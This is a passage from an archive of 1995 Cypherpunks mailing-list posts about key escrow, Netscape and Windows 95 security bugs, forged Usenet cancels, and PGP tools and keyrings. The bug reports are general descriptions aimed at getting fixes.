to foil {cr,h}ackers and viruses (*), chances are a lot of people will
ask their one colleague or friend that does know PGP to verify it for them.

Footnotes:
  (*) well, gotta use the four horse{wo,}men, no?

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMHHu7CxV6mvvBgf5AQHTaAP/W2RKNFiGFc4WjE4saoAls8/Q3N+zlkqm
sDOCga9t9ElSY+jf0XQR/MLxMnuJ4n2H1gbzxnK+ELAbubzRBjNfK+I66IsN89nd
FYEwtnGMSgmmPtO2Y8X0KaFwkdRS8XUVgvnyYVrrhz/6dh3VvcLy5imLBK0fbIrA
r2+u9FL6fuQ=
=2WVg
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@it.kth.se>
Date: Wed, 4 Oct 95 04:58:26 PDT
To: Mats Bergstrom <asgaard@sos.sll.se>
Subject: Re: Europe
In-Reply-To: <Pine.HPP.3.91.951001183508.11746A-100000@cor.sos.sll.se>
Message-ID: <199510041155.MAA18408@piraya.electrum.kth.se>
MIME-Version: 1.0
Content-Type: text/plain



| Sweden: The authorities have not yet said anything at all about
| where they stand in the GAK controversy. Probably very few have
| heard about it. 

This may surface in the swedish media very soon now. There will 
be an article in Ny Teknik next week about these issues, and they
have done some digging at Brussels as well. 

I've tried to get 'Striptease' (discussion TV-program) 
interested as well, but I don't know about them.

So lets go off and think hard about good (culture-related) arguments
why this is a bad idea. We'll gonna have to look really nice, and
say some sensible things. :-)

I'm personally attacking the assumption that the police cannot get
to the encrypted traffic without key escrow. Well, why not bug the
keyboard on the originating machine? Etc etc...

I'm currently planning to start an email list dicussing this issue,
but I need some proper political clearance first. (They should at
least have a say, I guess.)

Another thing that is currently happening in Sweden is that a 
National Identity Card is being proposed by a mjor part of the
swedish industry and other players. This ID-card will be a smart 
card, and is meant to be used in most places.

| The only thing that has come up on a public
| (television) level is demands from the police of access to
| decoded GSM traffic, which I believe is under implementation
| now (the obstacle has mainly been who is going to pay for the
| software updates of the GSM nodes). Sweden has rather strict
| rules for wiretapping (at least officially) and their is no
| public pressure for any change in this.

What strikes me as so strange is that we have an official phonetapping
approval rate of 300/yr, in a population of 8 million people.
How can the phone tapping be so important then?

| I think the basic difference USA vs Sweden in this regard is a
| time delay of some years. We have lots of Internet nodes per
| capita (more than in the US, they say) but the net is still
| largly run by engineers (if only that could last!) and net
| awareness is rare above the age of 30 (i.e. among those who
| have a say).

I think things are moving faster in this area than we might think.
There is certainly things happening at the EU level, according
to the Ny Teknik reporter I spoke with. There is a resolution at
the Council of Ministers, already taken during 1994, apparantely.
He was vague about the contents of that resolution, however.

| PS
| Perry, what was your impression of the Swedes you met at the
| IETF meeting in Stockholm last July? I guess they were so
| happy about the new 34 Mbit/s connection to the New World
| that they forgot about the rest?

I'm listening, I'm listening... :-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Evans <devans@hclb.demon.co.uk>
Date: Wed, 4 Oct 95 06:58:32 PDT
To: cypherpunks@toad.com
Subject: [Fwd] Security Threat to Internet shopping (DT)
Message-ID: <812839578snx@hclb.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Security threat to Internet shopping

Daily Telegraph (paper edition), 3 October 1995, p. 12


by Robert Uhlig

Home shopping on the Internet is under threat after hackers cracked the
encryption coding used to protect credit card transactions on Netscape,
the most popular software used for access.

A second security flaw, discovered in Microsoft Windows 95's E-Mail
electronic messaging system, has caused alarm.

Ian goldberg and David Wagner, the hackers, belong to a group called
Cypherpunks and said they had exposed Netscape's weaknesses to show the
ease with which digital money or electronic messages could be
intercepted by criminals, governments or business competitors.

The two computer science students took only a few days to find that the
software used a predictable date and time-based formula to generate a
random encryption code made up of 30 numbers each time a message was
sent.

They then posted their findings on the Internet.

Netscape responded by saying it would share parts of the security code
with security experts including the Massachusetts Institute of
Technology in the hope that this would improve its security.


The company has also released a free updated version of its software
for browsing the World Wide Web part of the Internet.

The company said it also planned to  extend the encryption key from 30
digits to 300 digits and use more random information to generate the
key.

However, American law on  encryption technology forbids the export of
software  containing encryption keys longer than 40 digits, so Internet
users outside America will not be able to download copies of the
software from Netscape.

Visa and Microsoft have been working jointly on what they call Secure
Transaction Technology, which they claim will allow users to buy goods
over the Internet.

However, users of Microsoft's Windows 95 have found that it ignores the
security passwords on private electronic mail  sent or received using
software other than Windows 95.


(end)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MIGUELDIAZ@megaweb.com ()
Date: Wed, 4 Oct 95 11:38:52 PDT
To: cypherpunks@toad.com
Subject: Re: `Hack Microsoft' challenge is NYT Computer News Daily's top story
Message-ID: <199510041836.OAA08014@mail-e1a.megaweb.com>
MIME-Version: 1.0
Content-Type: text/plain




>MIGUEL DIAZ writes:
>> I don't know about everyone else, but a T-shirt seems a
> very 
>> small reward for uncovering a "hole" in the encryption 
>> algorithm of Microsoft products.  
>
>I don't know about anyone else, but helping to protect the
> confidential data 
>of millions of users around the world seems a very large
> reward for
>uncovering a hole in the encryption algorithms of M$
> products.
>
>Clearly, YMMV.
>
>-Futplex <futplex@pseudonym.com>

If it means protection only when using a proprietary product 
owned by Microsoft then no, I still don't see it as much of a 
reward.  If we are talking a system which can be used by 
everyone at no cost, then yes that would be motivating.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jerry_Ellig@jec.senate.gov
Date: Wed, 4 Oct 95 12:27:30 PDT
To: cypherpunks@toad.com
Subject: David Chaum testimony
Message-ID: <9509048128.AA812845568@smtpgwys.senate.gov>
MIME-Version: 1.0
Content-Type: text/plain


     I'm a professor from George Mason University on leave to do some work 
     with the Joint Economic Committee on the economy of the 21st century.  
     I found your e-mail address attached to some congressional testimony 
     by David Chaum.  Does anyone know when he testified, and before what 
     committee?  Being new on Capitol Hill, I haven't yet found the easy 
     way to find this out from inside the government!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 4 Oct 95 12:45:29 PDT
To: bsdc@ai.mit.edu
Subject: CSPAN2: Copyright on the Internet
Message-ID: <v02120d0bac9894397b65@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


It's 3:43 pm EST, and CSPAN-2 has Cerf, the CO$ counsel, and others on a
panel about copyright on the internet...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alan B. Clegg" <abc@gateway.com>
Date: Wed, 4 Oct 95 13:12:10 PDT
To: cypherpunks@toad.com
Subject: Digest [full] version available
Message-ID: <Pine.LNX.3.91.951004155756.2546B-100000@black-ice.gateway.com>
MIME-Version: 1.0
Content-Type: text/plain


I have setup an un-moderated digest of the Cypherpunks mailing list and it
is now available for everyone..

My main goal on Cypherpunks is to lurk and the digest version lets me do
that without being forced to read each one as it comes in.. [or filter 
the posts into a mailbox that I have a bad tendancy to leave for long 
periods of time...]

Digests will be created every 40K bytes.

subscribe by sending e-mail to majordomo@gateway.com with a BODY line:

		subscribe cypherpunks-d

Enjoy..
-abc

      It's time to stand and cry             |  Alan B Clegg
       That Freedom will not live             |  President
         Beyond our willingness to die         |  Gateway Communications
          -Lester Bork                          |  http://www.gateway.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 4 Oct 95 16:18:20 PDT
To: sameer@c2.org
Subject: Re: New Netscape bug (in version 1.12)
Message-ID: <199510042316.QAA22055@ammodump.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Oct 4, 11:00am, sameer wrote:
> Subject: Re: New Netscape bug (in version 1.12)
> 	Isn't there a resolver #define or something in limits.h called
> MAXHOSTNAMELEN ? Something like that? (Perhaps not, but that's what I
> recall..)

  We are using MAXHOSTNAMELEN if it exists, both in 2.0, and in the
security patch that we shipped.  If it doesn't exist we just assume 64.
As a quick sample, on sunos and irix it is 64, and on solaris it is 256.
On sunos and irix it is defined in sys/param.h, and on solaris it is
defined in netdb.h.  I wasn't able to find any mention of it or any
other limits on the host names passed in to gethostbyname() in the
man pages on any of these systems.

	--Jeff


Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Tang <altitude@cic.net>
Date: Wed, 4 Oct 95 13:20:55 PDT
To: sameer@c2.org (sameer)
Subject: Re: New Netscape bug (in version 1.12)
In-Reply-To: <199510041800.LAA07074@infinity.c2.org>
Message-ID: <199510042020.QAA01358@petrified.cic.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed Oct  4 14:00:26 1995: you scribbled...
>
> > How do I decide what is too long?  For example, when tracking down buffer
> > overflow problems for the security patch, we found an undocumented
> > static buffer limit of 64 bytes for the hostname passed to gethostbyname()
> > on IRIX.  Before we stumbled across this problem, we had a discussion
> > about what length we should truncate host names to.  People thought
> > that 128 characters was a reasonable limit, but it turned out that it
> > was too long.
>
>
> 	Isn't there a resolver #define or something in limits.h called
> MAXHOSTNAMELEN ? Something like that? (Perhaps not, but that's what I
> recall..)

The DNS RFC specifies that the max hostname should be 255 characters, with
a 63 character limit for each segment of the name (RFC1035, section
2.3.4.)

- --> 2.3.4. Size limits
- -->
- --> Various objects and parameters in the DNS have size limits.  They are
- --> listed below.  Some could be easily changed, others are more
- --> fundamental.
- -->
- --> labels          63 octets or less
- -->
- --> names           255 octets or less

But, some older systems (SunOS4, and IRIX, amongst others) have the
MAXHSTNAMELEN defined as 64 characters, so this limits the max name to 64.
Solaris2 has MAXHOSTNAMELEN defined to 255 characters.
(the define is in sys/param.h for sunos and solaris).  

just a point of interest...

...alex...

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Alex Tang <altitude@umich.edu> or Alex Tang <altitude@cic.net>

iQCVAwUBMHLsMaNd+TOtm9v5AQGbGQQAiFMaOyaLQlJgO+47dkw4H4O4FP8dJooR
lkFmooBTFr/BWaZ7Zl9KFwCSwm/COH5ZfQpf6zo0pWlvGYDVAYPomaV90Z1zg+dk
0jNhidLwCrxlNOKa+MyqBJiUpfyq76OW46A9V1VDa5OH8g8bbv8zn//GJCGlF+6K
3s+zjFkR4tM=
=0I/O
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Reich <Richard_Reich@reich.com>
Date: Wed, 4 Oct 95 16:46:49 PDT
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: CSPAN2: Copyright on the Internet
In-Reply-To: <v02120d0bac9894397b65@[199.0.65.105]>
Message-ID: <199510042345.QAA00540@lux.reich.com>
MIME-Version: 1.0
Content-Type: text/plain


From tonight's C-SPAN (not 2) overnight schedule:

2:45 am ET/11:45 pm PT

Cyber Law Institute, Georgetown University Law Center: "The Internet and 
Property Rights: What's Mine is
Yours" 

Speaking: Wayne Rush, Communication Week; Vint Cerf, MCI; Bill Burrington, 
AOL; Peter Pitsch-Progress
and Freedom Foundation; Others 


These are sometimes wildly inaccurate, so don't blame me.

-r
-- 
Richard Reich / Internet Consulting / +1 415 668 3311
... and that things are not so ill with you and me as they might
have been, is half owing to the number who lived faithfully a hidden
life, and rest in unvisited tombs.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Reich <Richard_Reich@reich.com>
Date: Wed, 4 Oct 95 16:48:37 PDT
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: CSPAN2: Copyright on the Internet
In-Reply-To: <v02120d0bac9894397b65@[199.0.65.105]>
Message-ID: <199510042348.QAA00554@lux.reich.com>
MIME-Version: 1.0
Content-Type: text/plain


Ooops.  This is from the C-SPAN2 schedule (which I don't bother with because 
it turns into, no kidding, The Playboy Channel at 5pm every day <g>):

8:35 pm ET/5:35 pm PT

Cyber Law Institute, Georgetown University Law Center: "The Internet and 
Property Rights: What's Mine is
Yours" 

Speaking: Wayne Rush, Communication Week; Vint Cerf, MCI; Bill Burrington, 
AOL; Peter Pitsch-Progress
and Freedom Foundation; Others 


-- 
Richard Reich / Internet Consulting / +1 415 668 3311
... and that things are not so ill with you and me as they might
have been, is half owing to the number who lived faithfully a hidden
life, and rest in unvisited tombs.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@Networking.Stanford.EDU>
Date: Wed, 4 Oct 1995 16:57:57 -0700 (PDT)
To: "Henry Sanders (Exchange)" <henrysa@microsoft.com>
Subject: Re: Serious Windows TCP/IP Security Hole
In-Reply-To: <c=US%a=_%p=Microsoft%l=BENJI951004101104NS00DC0D@CHOPPER>
Message-ID: <Pine.ULT.3.91.951004165333.19409K-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I'm forwarding you a couple messages. I haven't run SAMBA myself, but 
people who have have been able to read files on my machine that aren't 
supposed to be shared.

-rich

On Wed, 4 Oct 1995, Henry Sanders (Exchange) wrote:

> Hi, I've jumped in late on this thread. What is the bug referred to in the note below? I might be able to give you current status on it.
> 
> Thanks,
> Henry Sanders
> henrysa@microsoft.com
> 
> >In article <44amc4$ft6@nntp.Stanford.EDU>, llurch@networking.stanford.edu
> says...
> >>
> >>FYI for those of you still running WFW. Could anybody confirm or deny
> >>that Microsoft has patched this hole in the shipping version of 95?
> >>As with most such serious "oopsies," Microsoft has not made any
> >>information on this issue available in their Knowledge Base.
> >
> >Nope, it is still there.
> 
> Can you demonstrate that this is true? I'll give you an account on my box.
> I've received several notes and flames that the problem either never
> existed (which I know is untrue) or was fixed at a specified (often
> specified different) patch level.
> 
> I should really try this myself, but I don't have time, and the only UNIX
> box I can really mess with is my Linux box, which is also my Win95 box.
> 

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@Networking.Stanford.EDU>
Date: Wed, 4 Oct 1995 16:58:40 -0700 (PDT)
To: henrysa@microsoft.com
Subject: Re: Serious Windows TCP/IP Security Hole (fwd)
Message-ID: <Pine.ULT.3.91.951004165820.19409L-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


---------- Forwarded message ----------
Date: Sat, 30 Sep 1995 02:01:56 -0700 (PDT)
From: Rich Graves <llurch@Networking.Stanford.EDU>
To: Ken Simler <krs2@cornell.edu>
Subject: Re: Serious Windows TCP/IP Security Hole (fwd)

I don't really know, I'm just passing on news... maybe talk to these folks.

-rich

---------- Forwarded message ----------
Date: Thu, 28 Sep 95 19:56:38 PDT
From: Tom Czarnik <czarnik@netmanage.com>
To: Rich Graves <llurch@Networking.Stanford.EDU>
Subject: Re: Serious Windows TCP/IP Security Hole 


On Thu, 28 Sep 1995 18:31:07 -0800  Rich Graves 
>Can you demonstrate that this is true? I'll give you an account on
>my box. I've received several notes and flames that the problem 
>either never existed (which I know is untrue) or was fixed at a 
>specified (often specified different) patch level.

We can do it your way or if you are physically located at Stanford,
you can schedule an appointment to come by NetManage. We are located
in Cupertino, right off 280 at DeAnza Blvd.

The choice is yours.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@Networking.Stanford.EDU>
Date: Wed, 4 Oct 1995 16:59:03 -0700 (PDT)
To: henrysa@microsoft.com
Subject: Re: Serious Windows TCP/IP Security Hole (fwd)
Message-ID: <Pine.ULT.3.91.951004165855.19409M-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


---------- Forwarded message ----------
Date: Sat, 30 Sep 1995 02:03:58 -0700 (PDT)
From: Rich Graves <llurch@Networking.Stanford.EDU>
To: Ken Simler <krs2@cornell.edu>
Subject: Re: Serious Windows TCP/IP Security Hole (fwd)

This doesn't work for you? Please get back to me if you figure it out. 
I'd like to document the problem accurately.

-rich

---------- Forwarded message ----------
Date: Thu, 28 Sep 95 23:45:49 -0400
From: Mark Thornton <markt@eng.umd.edu>
To: llurch@networking.stanford.edu
Newgroups: comp.os.ms-windows.win95.misc,
    comp.os.ms-windows.networking.windows,
    comp.os.ms-windows.networking.tcp-ip
Subject: Re: Serious Windows TCP/IP Security Hole

I can confirm that the complete(floppy) version of Windows 95 
STILL has the ../ bug ;-( The ... bug has been fixed correctly 
returning the following message
chkpath: ERRDOS - ERRbadpath (Directory invalid.)
But cd ../ WILL put you in the root directory of the share
with the rights you had in the intial directory. Very bad...
I've had to share all my drives read-only until the problem 
gets fixed.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 4 Oct 95 14:12:47 PDT
To: cypherpunks@toad.com
Subject: Re: David Chaum testimony
Message-ID: <199510042110.RAA28372@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9509048128.AA812845568@smtpgwys.senate.gov>,
Jerry_Ellig@jec.senate.gov wrote:

>      I'm a professor from George Mason University on leave to do some work 
>      with the Joint Economic Committee on the economy of the 21st century.  
>      I found your e-mail address attached to some congressional testimony 
>      by David Chaum.  Does anyone know when he testified, and before what 
>      committee?  Being new on Capitol Hill, I haven't yet found the easy 
>      way to find this out from inside the government!

The full text of the testimony is available at

http://www.digicash.com/publish/testimony.html
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMHL4SSoZzwIn1bdtAQEjdAGAhUoSwRu803hFI8ARmqsmbASy1CNNK7Cj
rl5Tw5mMVGoZcPwhsyO5Af02z6lhIfyw
=L1hB
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Holger.Reif@PrakInf.TU-Ilmenau.DE (Holger Reif )
Date: Wed, 4 Oct 95 09:39:25 PDT
To: cypherpunks@toad.com
Subject: [Fwd] Security Threat to Internet shopping (DT)
Message-ID: <9510041637.AA27588@PrakInf.TU-Ilmenau.DE>
MIME-Version: 1.0
Content-Type: text/plain


>Security threat to Internet shopping
>
>Daily Telegraph (paper edition), 3 October 1995, p. 12
>
>[...]
>However, users of Microsoft's Windows 95 have found that it ignores the
>security passwords on private electronic mail  sent or received using
>software other than Windows 95.

Never heard of this before, but it seems that MS assumes there's no mail
like windows'95 mail? 

If all use it, you have no holes any longer.

You or your partners don't use Windows'95? That's your problem not ours!


read you later  -  Holger Reif
http://remus.prakinf.tu-ilmenau.de/Reif/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Wed, 4 Oct 95 17:40:11 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: New Netscape bug (in version 1.12)
In-Reply-To: <44td0c$3um@tera.mcom.com>
Message-ID: <199510042139.RAA26832@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



Jeff Weinstein wrote:
> >   That's true, but it is also true that Netscape should also be
> > performing some sanity checking on input rather than relying on 
> > the supporting libraries to be secure. Remember, a hole is a hole.
> > The last sendmail bug was a buffer overflow in syslog, however,
> > sendmail still got patched to do bounds checking on the strings
> > it was passing to syslog. 
> > 
> >   It looks like this is only bug on BSDI2.0/XAccel, and NT3.5/NS1.1. But
> > is it wise for netscape to be sending 10,000 character strings to GUI
> > functions anyway? 
> 
>   While I agree that we should probably truncate this string to something
> smaller than 10000 characters(I've already filed a bug on it here), it
> is perfectly legal X protocol to send 10,000 characters to the X server.
> How do I decide what is too long?  For example, when tracking down buffer
> overflow problems for the security patch, we found an undocumented
> static buffer limit of 64 bytes for the hostname passed to gethostbyname()
[lots deleted]

  I agree with a lot of what you say Jeff. What I would do is set the string
limits to be whatever the specs allow. For instance, in the case of
domain names, the limit is supposed to be 256. In a mailto: just what
is the limit of an RFC822 valid e-mail address? 

  I will say that Netscape is a very robust program. I have created documents
with 10,000 nested <UL> lists, and the program didn't dump. I have
created forms with 10,000 selection widgets with overlong labels and variable
names and it handled them (didn't diusplay them very well) However, I am
a little weary of netscape allowing lists and forms having 10,000
levels. For one thing, although the 10,000 nested lists didn't crash
netscape, they did use up all the swap space on my computer except for
300k. A 10K byte document was able to exhaust 32megs of ram.

  When I combined supernested lists, with overlong FORM variable names,
and an extra long title, I did get a few sporadic coredumps. Some people
may have a religious position on browsers limiting SGML/HTML nested
structures (because they feel the browser should be able to handle any
"legal" document), but I for one am more pragmatic. 

  I hope you don't take my criticisms as an attack on your programmers.
Netscape is my all around favorite application. I just want to see it
improved and safer.

-Ray
 

 


    



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 4 Oct 95 15:09:14 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: David Chaum testimony
In-Reply-To: <9509048128.AA812845568@smtpgwys.senate.gov>
Message-ID: <199510042211.SAA22395@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Jerry Ellig writes:
>      I found your e-mail address attached to some congressional testimony 
>      by David Chaum.  Does anyone know when he testified, and before what 
>      committee?  Being new on Capitol Hill, I haven't yet found the easy 
>      way to find this out from inside the government!

According to http://www.digicash.com/publish/testimony.html, he testified
on July 25, 1995 before the Subcommittee on Domestic and International 
Monetary Policy of the House Committee on Banking and Financial Services.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@robo.remailer
Date: Wed, 4 Oct 95 18:16:31 PDT
To: cypherpunks@toad.com
Subject: SAIC Bags Tier 1 Job
Message-ID: <199510050111.SAA09834@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


SAIC Awarded Multimillion Dollar Communications Security
Contract


San Diego, Oct. 3 /PRNewswire/ -- Science Applications
International Corp. (SAIC) said it has been awarded a
three year, $28 million contract to support the Space and
Naval Warfare Systems Command (SPAWAR).

The Common Tier 1 System will integrate computers and
software to implement and field the Tier 1 element of the
Department of Defense's Electronic Key Management System.

This program will provide automated communications
security and key management system support for the Navy,
Army, Air Force, Marines, Coast Guard and other
government agencies.

Common Tier 1 will help implement the Electronic Key
Management System and support its integration with COMSEC
material management in the Navy, Army, Air Force and
joint key management systems.

The work performed on this contract will be split between
San Diego (66%) and Camden, New Jersey (34%), and is
expected to be completed in October 1998.

"We expect to hire an additional 65 employees in San
Diego during this contract to primarily work on software
development," said SAIC Program Manager Tom Trebelhorn.

"This is a very significant win that allows SAIC to
continue its involvement in this key information security
program and extend the company's commitment to the
communication security field," Trebelhorn added.

SAIC provides high-technology services and products for
government and private industry in the areas of space,
transportation, national security, environment, health
care, energy and systems integration.  With nearly $2
billion in annual revenues, the employee-owned, San Diego
based company has 20,000 employees in more than 350
locations worldwide.

Contact:  Tom Trebelhorn, Operations Manager of SAIC,
619-552-5319, or fax, 619-452-3540, or e-mail,
tom_trebelhorn@cpqm.saic.com/












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simeon ben Nevel <snevel@schwab.com>
Date: Wed, 4 Oct 95 15:19:25 PDT
To: karlsiil@attmail.com>
Subject: Re: New Windoze PGP Shell (freeware) worth checking out
In-Reply-To: <winATT-2.7-karlsiil-1616>
Message-ID: <Pine.SUN.3.91.951004181435.2377D-100000@w0140dev>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 4 Oct 1995, Karl A Siil wrote:

> OK, I'll bite. Where do I get it? Where did you get your info? Do you have a 
> copy?

> From: internet!powergrid.electriciti.com!adam (Adam Philipp)
> Subject: New Windoze PGP Shell (freeware)  worth checking out

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> AEgis Research (who I know nothing about) has come out with a very pleasant
> windows fron end for PGP. It is bone-head compliant, and even works well in
> Win95. I'm only plugging because I was so impressed. Until Eudora has PGP
> hooks, this is my shell of choice.


I saw it on alt.security.pgp

it's at <http://iquest.com/~aegisrc>

It is pretty nice

The url to download isn't on the home-page though, but it's only one 
level down... just snoop about a bit.

simeon


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
snevel@schwab.com 
#include std.disclaimer
I speak for myself and no one else





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@left.webcasters.com (Jim Grubs (W8GRT))
Date: Wed, 4 Oct 95 15:48:58 PDT
To: cypherpunks@toad.com
Subject: Re: Keyserver keyrings
Message-ID: <LBygcD2w165w@left.webcasters.com>
MIME-Version: 1.0
Content-Type: text/plain


syrinx@c2.org (Syrinx Anonymous Remailer) writes:

> According to 'Derek Atkins':
>  
> > The name pgp.mit.edu is now
> > pointing at another machine (which I do not maintain).  For access to
> > the keyring, send email to pgp-public-keys@pgp.mit.edu -- that is the
> > supported method of access.
> 
> does anybody out there maintain a current keyring that can be grabbed
> via anon ftp instead? It seems like a waste of time for hundreds of
> users to continually add updates to their own keyrings when the whole
> keyserver ring can be picked up at one time, updates and all? ftp is
> much more convenient than stringing together multiple sections received
> by e-mail.

That's what I did with WS_FTP until they stopped updating it on August 24th.

[Pgpkeys]
HOST=ftp.informatik.uni-hamburg.de
UID=anonymous
LOCDIR=c:\pgp
DIR=/pub/virus/crypt/pgp

--
                        WebCasters(tm)
James C. Grubs                             jgrubs@webcasters.com
6817 Maplewood Avenue                         Tel.: 419-882-2697
Sylvania, Oh 43560                             Fax: 419-885-2814
  Internet consulting, HTML programming, Information brokering
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 4 Oct 95 16:18:36 PDT
To: owner-cypherpunks@toad.com
Subject: Re: FORGED CANCELS of posts on n.a.n-a.m
Message-ID: <9510042317.AA14344@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>If the cancel cannot be authenticated (e.g., because the original article lacks
>the "Cancel-lock: M2" header, or the cancel lacks the "Cancel-key: M1" header
>such that H(M1)=M2), then INN should forward the unauthenticated cancel to one
>or more "collection centers" so the author of the original article may be
>notified.

So if 70% of Usenet follows this scheme a handful of forged cancels can easily
cause melt down.

>Each "collection center" deamon should wake up periodically (say, every hour),
>group the collected unauthenticated cancels by message-ids of the cancelled
>articles, and e-mail the (distinct) addresses (other than "usenet@*" or
>"news@*") mentioned in the "From:", "Sender:", "Authorized:", and
>"X-Cancelled-By:" headers, quoting the unauthenticated cancel and the Path's as
>seen at many different sites that forwarded the cancels. This way, if the
>unauthenticated cancel is indeed forged, its author will see within hours that
>it has been fraudulently cancelled _and_ will automatically receive enough
>"Path:" samples from all over the world to see where it was posted, by
>comparing the "Path:" headers in several forwarded copies.

I can post a handful of articles and forge the From line, and create my
own Cancel-lock headers by "rolling the dice."  I can then get their mailbox
bombed by forging cancels.  A little more complicated then "sendsys-bombing"
but not much more so.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 4 Oct 95 17:03:27 PDT
To: cypherpunks@toad.com
Subject: McNeil Lehrer on Net Insecurity
Message-ID: <199510050002.UAA04740@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


McNeil Lehrer has a segment on net boogers this evening, 
reported by Time's anxious Elmer-Dewitt.


Diffie, Farmer and Shimomura, all beautifully coiffed, offer 
sagacious views.


It includes a clip of Kevin, unbeautifully cuffed and mutely 
eloquent. Says most of the charges against him have been 
plea-bargained away.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Wed, 4 Oct 95 18:11:16 PDT
To: cypherpunks@toad.com
Subject: GSS sample/demo?
Message-ID: <199510050115.UAA16284@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


Sorry for the 'broadcast', but I'm looking for some source code that shows
how GSS 'works' in real-world applications, as well as opinions on how good
it is.

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 4 Oct 95 20:20:41 PDT
To: cypherpunks@toad.com
Subject: Re: New Netscape bug (in version 1.12)
In-Reply-To: <44td0c$3um@tera.mcom.com>
Message-ID: <30734E26.194D@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Ray Cromwell wrote:
>   I agree with a lot of what you say Jeff. What I would do is set the string
> limits to be whatever the specs allow. For instance, in the case of
